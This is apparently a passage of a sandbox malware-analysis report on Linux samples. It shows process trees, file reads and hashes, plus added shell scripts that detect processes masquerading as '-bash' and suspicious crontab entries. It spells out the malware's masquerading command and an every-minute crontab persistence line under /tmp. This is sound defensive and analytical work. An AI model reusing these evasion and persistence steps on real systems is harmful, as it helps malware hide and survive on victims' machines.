File opened for reading /proc/741/status /bin/ps N/A
File opened for reading /proc/filesystems /bin/ps N/A
File opened for reading /proc/105/stat /bin/ps N/A
File opened for reading /proc/736/status /bin/ps N/A
File opened for reading /proc/12/status /bin/ps N/A
File opened for reading /proc/115/stat /bin/ps N/A
File opened for reading /proc/76/cmdline /bin/ps N/A
File opened for reading /proc/138/status /bin/ps N/A
File opened for reading /proc/15/status /bin/ps N/A
File opened for reading /proc/21/cmdline /bin/ps N/A
File opened for reading /proc/36/stat /bin/ps N/A
File opened for reading /proc/740/status /bin/ps N/A
File opened for reading /proc/78/stat /bin/ps N/A
File opened for reading /proc/657/stat /bin/ps N/A
File opened for reading /proc/115/stat /bin/ps N/A
File opened for reading /proc/698/cmdline /bin/ps N/A
File opened for reading /proc/716/cmdline /bin/ps N/A
File opened for reading /proc/11/cmdline /bin/ps N/A
File opened for reading /proc/6/cmdline /bin/ps N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/3/cmdline /bin/ps N/A
File opened for reading /proc/669/status /bin/ps N/A
File opened for reading /proc/660/cmdline /bin/ps N/A
File opened for reading /proc/76/stat /bin/ps N/A
File opened for reading /proc/36/stat /bin/ps N/A
File opened for reading /proc/78/status /bin/ps N/A
File opened for reading /proc/138/status /bin/ps N/A
File opened for reading /proc/376/stat /bin/ps N/A
File opened for reading /proc/16/cmdline /bin/ps N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/7/status /bin/ps N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cp N/A

Processes

/tmp/.systemd/.run

[/tmp/.systemd/.run]

/bin/grep

[grep ssh ]

/bin/grep

[grep -v R]

/bin/ps

[ps x]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/ps

[ps x]

/bin/grep

[grep ssh$]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/bin/grep

[grep sh$]

/usr/bin/awk

[awk {print $1}]

/bin/ps

[ps x]

/bin/uname

[uname -m]

/bin/cp

[cp -f -- .mips -bash]

/tmp/.systemd/-bash

[./-bash]
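
`.run` copies the architecture-specific payload to a file literally named `-bash` and executes `./-bash`, so in `ps` output the payload shows up as `-bash`, which at a glance is a login shell. The killer routines in behavioral30 are written around that name: the sweep that kills anything above 30% CPU explicitly skips lines ending in `-bash`, and the follow-up pass kills busy `-bash` processes only when more than one exists. The check below is an added example, not code from the sample or the sandbox output. It compares a process's displayed name with the file behind `/proc/<pid>/exe`, which the kernel resolves from the mapped executable and which `cp` and `argv[0]` tricks do not alter, and flags a shell-like name backed by a binary outside the usual shell directories, or any executable under a scratch directory. The list of legitimate shell directories is an assumption for the Debian targets in this report.

```shell
#!/bin/sh
# Added example: spot a process that names itself like a shell but runs from somewhere else,
# the trick behavioral5 uses with `cp -f -- .mips -bash; ./-bash`.

# Directories real shells are installed in on the report's Debian targets (assumption; extend).
LEGIT_SHELL_DIRS='/bin /usr/bin /sbin /usr/sbin'

# is_masqueraded_shell NAME EXE
#   NAME: the process name as ps shows it (argv[0] or comm), e.g. "-bash" or "./-bash"
#   EXE:  the target of /proc/PID/exe, resolved by the kernel from the mapped file
# Returns 0 (suspicious) or 1 (looks normal).
is_masqueraded_shell() {
  name=$1
  exe=$2
  # Anything executing out of a scratch directory is reportable on its own.
  case $exe in
    /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
  esac
  # A binary unlinked after start shows as "/path (deleted)".
  case $exe in
    *' (deleted)') return 0 ;;
  esac
  # Drop any directory part and the login-shell dash, then compare with real shell names.
  base=${name##*/}
  base=${base#-}
  case $base in
    sh|bash|dash|ash|zsh|ksh|busybox)
      exedir=${exe%/*}
      for d in $LEGIT_SHELL_DIRS; do
        [ "$exedir" = "$d" ] && return 1
      done
      return 0 ;;
  esac
  return 1
}

# scan_procs: walk /proc and print "pid<TAB>name<TAB>exe" for every process that fails the
# check; entries whose exe link is unreadable (kernel threads, other users' processes when
# not root) are skipped.
scan_procs() {
  for p in /proc/[0-9]*; do
    exe=$(readlink "$p/exe" 2>/dev/null) || continue
    name=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null | cut -d ' ' -f 1)
    [ -n "$name" ] || continue
    if is_masqueraded_shell "$name" "$exe"; then
      printf '%s\t%s\t%s\n' "${p#/proc/}" "$name" "$exe"
    fi
  done
}

# Constructed cases (not from the report's process list): the behavioral5 payload, two real
# shells, the behavioral30 binary under /tmp, and a deleted-on-disk executable.
for c in './-bash|/tmp/.systemd/-bash' '-bash|/usr/bin/bash' 'sh|/bin/dash' \
         '.i686|/tmp/.update/.i686' 'nginx|/usr/sbin/nginx (deleted)'; do
  name=${c%%|*}
  exe=${c#*|}
  if is_masqueraded_shell "$name" "$exe"; then verdict=SUSPICIOUS; else verdict=ok; fi
  printf '%-10s %-12s %s\n' "$verdict" "$name" "$exe"
done

# Live sweep of the current host (prints nothing on a clean system).
scan_procs
```

The name comparison is deliberately loose (`-bash`, `./-bash` and `bash` all normalise to `bash`) because the thing being caught is the resemblance, not an exact string; the decisive signal is the `exe` path, which here would be `/tmp/.systemd/-bash`.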

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/.systemd/auto]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.RBTJla /usr/bin/crontab N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/systemd.d /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/.systemd /tmp/.systemd/auto N/A

Processes

/tmp/.systemd/auto

[/tmp/.systemd/auto]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep .systemd]

/usr/bin/wc

[wc -l]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab systemd.d]

/bin/rm

[rm -rf systemd.d]

/bin/chmod

[chmod u+x .systemd]
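
This routine and the `.cron` rewrite in behavioral30 install the dropped binary the same way: dump `crontab -l`, check whether an entry already names the payload (`grep .systemd | wc -l` here, `grep '/tmp/.update/.i686$' | sort | uniq | wc -l` there), and if not write a temporary file and load it with `crontab <file>`, which is why a `/var/spool/cron/crontabs/tmp.*` file appears under Files in both analyses. In behavioral30 the entry is built as `'* * * * * '$dir/'/tmp/.update/.i686'`, so with `dir=/tmp/.update` it reads `* * * * * /tmp/.update//tmp/.update/.i686`: every minute, a path under `/tmp`, inside a hidden directory. The audit below is an added example for this report, not code from the sample or the sandbox; it scores crontab entries on exactly those three traits and serves both analyses. The sample crontab text is constructed; the `@reboot /tmp/.systemd/.systemd` line is a hypothetical entry in the style of behavioral8, whose actual crontab content the report does not show.

```shell
#!/bin/sh
# Added example: score crontab entries on the traits of the sample's persistence line.
# audit_crontab reads crontab text on stdin and prints "REASONS<TAB>LINE" per suspicious entry.
audit_crontab() {
  awk '
    function add(r) { reasons = (reasons == "") ? r : reasons "," r }
    /^[ \t]*(#|$)/                   { next }   # comments and blank lines
    /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }   # environment assignments such as SHELL= or PATH=
    {
      reasons = ""
      # The command is whatever follows the schedule: one @keyword or five time fields.
      # (System crontabs in /etc/cron.d carry a user column as well; it stays in cmd,
      # which does not disturb the checks below.)
      nfields = ($1 ~ /^@/) ? 1 : 5
      cmd = $0
      for (i = 0; i < nfields; i++) sub("^[ \t]*[^ \t]+[ \t]*", "", cmd)
      # Fires every minute, as the entry behavioral30 builds does.
      if (nfields == 5 && $1 == "*" && $2 == "*" && $3 == "*" && $4 == "*" && $5 == "*")
        add("every-minute")
      # Executable or argument under a world-writable scratch directory.
      if (cmd ~ "(^|[ \t=])/(tmp|var/tmp|dev/shm)/")
        add("tmp-path")
      # A hidden path component such as /.update or /.systemd.
      if (cmd ~ "/\\.[^./ \t]")
        add("hidden-path")
      if (reasons != "") printf "%s\t%s\n", reasons, $0
    }'
}

# audit_live_crontabs: the calling user's crontab plus the spool and drop-in files that
# `crontab <file>` writes to; reading other users' spools requires root.
audit_live_crontabs() {
  crontab -l 2>/dev/null | audit_crontab | sed 's/^/crontab -l: /'
  for f in /var/spool/cron/crontabs/* /var/spool/cron/* /etc/cron.d/* /etc/crontab; do
    [ -f "$f" ] || continue
    audit_crontab < "$f" | sed "s|^|$f: |"
  done
}

# Constructed sample (not taken from the report): a benign entry, the line behavioral30
# builds when $dir is /tmp/.update, and a hypothetical hidden-directory entry in the style
# of behavioral8.
SAMPLE_CRONTAB='# m h dom mon dow command
SHELL=/bin/sh
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * /tmp/.update//tmp/.update/.i686
@reboot /tmp/.systemd/.systemd'

# Prints two lines: the every-minute /tmp entry with all three reasons, and the @reboot
# entry with tmp-path,hidden-path. Call audit_live_crontabs to sweep the current host.
printf '%s\n' "$SAMPLE_CRONTAB" | audit_crontab
```

A hit on all three reasons at once is rare in legitimate crontabs; a single `tmp-path` or `hidden-path` hit is worth a look but does occur with user-installed tooling, so the script reports the reasons rather than a verdict.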

Network

N/A

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/var/spool/cron/crontabs/tmp.RBTJla

MD5 dbb47228523c48edfe60dda1b012f03d
SHA1 64adf38fbd662f2cdc856b0a1a1898d60d2e5c14
SHA256 0985d86b6a0b52111095135d4a0e5405848d42318445492d6540784bfc61f30e
SHA512 a720fc83063c925b735443be41ae8857d342c1a6dd64afe3463b6c9c64c35e4725641d3db5dd5ce7f22fc965e77d5218fb0903c592c51c777992e59b9419a287

/tmp/.systemd/.systemd

MD5 20abc8e72d4066c0565f7bbfad0fe526
SHA1 10cb464b8e9401cb3bfe17e059c957d79f4a93dd
SHA256 579de93e6119bdd4eb948bbdc32b0a3340bab93d4d0b5db723dbc5dddf82b09b
SHA512 9d849197900f20993624e5b713b24c72ffd269b078a7fc8574211258899bc70ddc85f00259d5f6aa3b032bcc0ec687524f042b6fed5e4fa96781d03a858ac977